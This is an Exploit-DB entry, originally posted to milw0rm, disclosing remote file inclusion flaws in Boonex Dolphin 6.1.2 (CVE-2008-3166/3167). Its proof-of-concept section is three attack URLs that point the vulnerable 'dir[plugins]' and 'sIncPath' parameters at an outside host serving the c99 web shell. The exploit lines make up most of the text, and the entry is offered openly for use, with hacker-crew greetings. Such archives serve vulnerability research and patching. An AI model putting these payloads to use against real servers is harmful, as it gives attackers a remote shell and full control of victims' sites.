Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions

Author: RoMaNcYxHaCkEr
type: webapps
platform: php
port: 
date_added: 2008-07-07  
date_updated: 2016-12-14  
verified: 1  
codes: OSVDB-46862;CVE-2008-3167;OSVDB-46861;OSVDB-46848;CVE-2008-3166  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comDolphin-v.6.1.2-Free.zip  

raw file: 6024.txt  

# Name Of Script : Dolphin PHP

# Version : 6.1.2

# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI In Multiple Files

# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below

# POC :

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :)

# rXh

# bEST wISHES

# milw0rm.com [2008-07-08]